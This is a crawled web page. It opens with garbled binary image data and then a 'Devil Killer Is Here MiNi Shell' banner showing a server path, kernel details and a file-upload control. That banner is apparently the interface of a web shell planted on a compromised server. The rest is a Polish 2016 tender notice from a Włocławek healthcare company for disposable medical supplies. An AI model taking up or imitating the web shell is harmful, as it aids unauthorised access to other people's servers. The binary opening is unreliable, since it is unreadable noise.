JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160321/29055-N-2016.html

<p class="kh_header"><b>Włocławek: ZP/02/2016 sukcesywna dostawa sprzętu jednorazowego użytku i materiałów medycznych dla MZOZ Sp. z o.o. we Włocławku, z podziałem na 6 pakietów</b><br>
<b>Numer ogłoszenia: 29055 - 2016; data zamieszczenia: 21.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Opieki Zdrowotnej Sp. z o.o. , ul. Kilińskiego 16, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 231 10 33, faks 054 232 56 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mzoz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o. o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/02/2016 sukcesywna dostawa sprzętu jednorazowego użytku i materiałów medycznych dla MZOZ Sp. z o.o. we Włocławku, z podziałem na 6 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1 - Wyroby z włókniny
Prześcieradła jednorazowe gramatura 35g/m2, rozmiar: 210x80 cm - 2 000 Szt.
Prześcieradło na roli, włókninowe, o wysokiej wytrzymałości mechanicznej, 50x50 mb, rolka - 350 Szt.
Plaster włókninowy z opatrunkiem 6cm x1mb - 300 Szt.
Przylepiec włókninowy na roli 2,5cm x 9,14m, nawinięty na rolce bez ograniczników - 1 100 Szt.
Lignina w arkuszach, biała, niepyląca, min. 40 cm x 60 cm w kg - 200 Kg
Wata w zwoju 150 g wykonana z celuloz: siarczanowych liściastych krótkowłóknistych i siarczanowych iglastych długowłóknistych, biała, równomiernie marszczona, bez obcego zapachu, mało pyląca, pakowana w 
bezpieczny sposób. Na opakowaniu jednostkowym winna być umieszczona nazwa wyrobu oraz nazwa producenta - 250 Szt.
Kompresy gazowe niejałowe 17 nitkowe, 5x5 cm, opakowanie: 100 szt. - 700 Op.
Kompresy gazowe niejałowe 17 nitkowe, 7,5 x7,5 cm, opakowanie: 100 szt. - 700 Op.
Kompresy gazowe jałowe 17 nitkowe, 5x5 cm,  opakowanie: 3 szt. - 30 000 Op.
Kompresy gaz. jałowe 17 nitkowe, 7,5x7,5 cm, opakowanie: 3 szt. - 35 000 Op.
Opaska dziana  4x5cm - 300 Szt.
Opaska dziana 4x10 cm - 400 Szt.
Opaska elastyczna 4x12 cm - 70 Szt.
Gaza jałowa 1/2M, 17 nitkowa - 200 Op.
Podkłady higieniczne z wkładem chłonnym z pulpy celulozowej, zewnętrzna warstwa z antyposlizgowej, nieprzemakalnej folii (90 x 60 cm) - 1 200 Szt.
Opatrunek jałowy do wenflonów - 1 500 Szt.

PAKIET 2 - Sterylny sprzęt i odzież zabiegowa
Maseczka jednorazowa, 3. warstwowa, na gumki - 100 Op.
Komplety zabiegowe do kriokomory (rękawice, skarpety, opaska, maseczka, szorty męskie/koszulki damskie, rozmiar: M), z naturalnego materiału: (bawełna, wełna) - 5 kompletów.
Komplety zabiegowe do kriokomory (rękawice, skarpety, opaska, maseczka, szorty męskie/koszulki damskie, rozmiar: L), z naturalnego materiału: (bawełna, wełna) - 5 kompletów.
Fartuch flizelinowy, jednorazowego użytku, z mankietem bawełnianym, niejałowy - 100 Szt.
Papier krepowany, miękki, 50/50 cm, opakowanie: 500 szt. - 5 Op.
Fartuch jednorazowy foliowy - 100 Szt.

PAKIET 3 - Strzykawki jednorazowego użytku
Strzykawka jednorazowego użytku. trzyczęściowa, niskooporowa, wyposażona w czytelną skalę, typu Janette, do płukania i karmienia, o pojemności:  100-120 ml, z uszczelnieniem z elastycznego materiału (silikon, guma, guma syntetyczna lub inny równoważny), opakowanie: 100 szt. - 5	Op. 

PAKIET 4 - Kaniule i cewniki
Kaniula do wlewów dożylnych 0,7 x 19 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 200 Szt.		
Kaniula do wlewów dożylnych 0,9 x 25 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 600 Szt.		
Kaniula do wlewów dożylnych 1,1 x 33 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 600 Szt.		
Kaniula do wlewów dożylnych 1,3 x 45 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 300 Szt.		
Aparat do przetoczeń płynów infuzyjnych - 1 000 Szt.				
Cewnik urologiczny Foleya dwudrożny 14 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, 
długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 60 Szt.				
Cewnik urologiczny Foleya dwudrożny 16 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, 
długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 60 Szt.				
Cewnik urologiczny Foleya dwudrożny 18 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie, 1 szt. - 100 Szt.			
Cewnik urologiczny Foleya dwudrożny 20 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie, 1 szt.	- 80 Szt.		
Cewnik urologiczny Foleya dwudrożny 22 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 30 ml, z kolorowym oznaczeniem rozmiaru, długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie, 1 szt.	- 80 Szt.				
PAKIET 5 - Drobny sprzęt ginekologiczny
Utrwalacz cytologiczny, pojemność: 150-200 ml - 20 Op.
Żel do USG, pojemność opakowania: 0,5L - 400 Szt.
Osłonki lateksowe do głowic USG nawilżone, pojedynczo pakowane (opakowanie: 144 szt.) - 30 Op.
Pałeczki do pobierania wymazów sterylne, 20-22 cm, opakowanie: 25 szt. - 80 Op.
Szczoteczki cytologiczne trójkątne typu wachlarzyk jałowy - 5 000 Szt.
Wziernik ginekologiczny rozmiar: XS, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 24 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 1 000 Szt.
Wziernik ginekologiczny rozmiar: S, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 24 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 1 000 Szt.
Wziernik ginekologiczny rozmiar: M, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 26 mm, jednorazowy, sterylny, pakowany indywidualnie po1 szt. - 3 500 Szt.
Wziernik ginekologiczny rozmiar: L, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 26 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 400 Szt.
Szkiełka cytologiczne z polem do opisu, białe, opakowanie: 50 szt. - 90 Op.

PAKIET 6 - Drobny sprzęt medyczny
Szpatułki drewniane jałowe, opakowanie: 100 szt. - 400 Op.				
Opaska identyfikacyjna dla dorosłych, opakowanie: 100 szt. - 1 Op.	
Worek na zwłoki plastikowy, zapinany na zamek błyskawiczny - 50 Szt.	
Staza automatyczna wielokrotnego użytku, posiadająca możliwość sterylizacji - 30 Szt.				
Nożyczki chirurgiczne Standard, końce tępo-ostre, proste, dł. 16,5 cm (+/- 0,5 cm) - 20 Szt.				
Rurki karbowane plastikowe do inhalatorów, o długości od 80 cm do 120 cm - 30 Szt.				
Ustniki jednorazowe plastikowe do inhalatora - 200 Szt.				
Maska do inhalatora dziecięca - 50 Szt.				
Maska do inhalatora dla dorosłych - 20 Szt.				
Worek do zbiórki moczu pojemność: 2 l, sterylny, dren 90cm, posiadający zawór ST - 250 Szt.				
Cewnik do odsysania górnych dróg oddechowych 18CH, długość 40-60 cm - 100 Szt.				
Cewnik do podawania tlenu przez nos, długość: co najmniej 2 m - 300 Szt.
Rurka intubacyjna z mankietem niskociśnieniowym, FI 7,5 - 20 Szt.	
Rurka intubacyjna z mankietem niskociśnieniowym, FI 6,5 - 20 Szt.	
Rurka ustno gardłowa Guedel 0 (czarna), sterylna - 15 Szt.				
Rurka ustno gardłowa Guedel 2 (zielona), sterylna - 20 Szt.				
Rurka ustno gardłowa Guedel 3 (żółta), sterylna - 20 Szt.				
Zgłębnik żołądkowy CH16x1000	- 50 Szt.				
Zgłębnik żołądkowy CH18x1000 - 50 Szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zgodnie z zapisem art. 34 ust. 5 ustawy Pzp przewiduje możliwość  zastosowania prawa opcji. Zamawiający w celu prawidłowego określenia poziomu i zakresu zamówienia, obarczonego jak najmniejszym błędem porównał wielkości przedmiotowego zamówienia do analogicznych kontraktów i wyników ich realizacji z poprzedniego roku przyjmując jako punkt wyjścia zbliżoną sytuację w okresie realizacji przedmiotu zamówienia objętego niniejszym postępowaniem, jednakże w przypadku jeśli w trakcie realizacji zamówienia okaże się, iż wymagane jest zapewnienia dodatkowego sprzętu  jednorazowego użytku i materiałów medycznych, niezbędnych do realizacji świadczonych przez Zamawiającego usług medycznych, wynikającego i uzasadnionego liczbą i specyfiką wykonywanych przez Zamawiającego zabiegów medycznych, których liczba nie jest w dniu rozpisania postępowania, jak i zawarcia umowy Zamawiającemu, znana oraz uwzględniające uwarunkowania wynikające z podpisanych kontraktów z Narodowym Funduszem Zdrowia w stosunku do przewidzianego w Szczegółowym opisie przedmiotu zamówienia Zamawiający pozostawia sobie możliwość skorzystania z prawa opcji i zamówienia dodatkowego sprzętu za które Wykonawcy będzie przysługiwało odrębne wynagrodzenie. W przypadku konieczności zamówienia dodatkowej ilości sprzętu wskazanego w SIWZ rozliczenie będzie następowało na podstawie cen jednostkowych ujętych w formularzu ofertowo-cenowym stanowiącym do SIWZ.
Natomiast w przypadku zamówienia sprzętu nieujętego w SIWZ, rozliczenie będzie następowało na podstawie średnich cen rynkowych. Całkowite wynagrodzenie Wykonawcy za dostarczenie (zapewnienie) i obsługę dodatkowego sprzętu objętego prawem opcji nie może przekroczyć 20% wynagrodzenia Wykonawcy za wykonanie podstawowego zakresu przedmiotu zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku, oraz gdy Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 dostaw odpowiadających swym zakresem przedmiotowi zamówienia - tj. dostawie medycznych materiałów i sprzętu jednorazowego użytku, o łącznej wartości nie mniejszej niż 100 000,00 zł za oferowany przedmiot zamówienia, wraz z podaniem ich wartości, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane oraz dołączeniem dowodów potwierdzających czy zostały wykonane lub są wykonywane należycie.
W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Zamawiający żąda wskazania w wykazie informacji o dostawach, tożsamych     z przedmiotem zamówienia,  niewykonanych lub wykonanych nienależycie - jeśli miały one miejsce - umożliwiających Zamawiającemu weryfikację pod kątem wskazanych wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje w tym zakresie szczegółowych warunków. Ocena spełnienia warunku, posiadania uprawnień, nastąpi w oparciu o przedstawione przez Wykonawcę odpowiednie oświadczenie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ) o spełnieniu warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Zamawiający żąda wskazania w wykazie informacji o dostawach, tożsamych     z przedmiotem zamówienia,  niewykonanych lub wykonanych nienależycie - jeśli miały one miejsce - umożliwiających Zamawiającemu weryfikację pod kątem wskazanych wymagań. Z informacji Wykonawcy winno wynikać jakie były przyczyny, i po której stronie leżały, które doprowadziły do niewykonania lub nienależytego wykonania każdej  z takich wymienionych dostaw. W razie konieczności, szczególnie, gdy wykaz lub dowody, przedstawione przez Wykonawcę będą budzić wątpliwości Zamawiającego lub gdy  z poświadczenia albo z innego dokumentu wynikać będzie, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz, którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów, bezpośrednio Zamawiającemu (§ 1 ust. 5 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
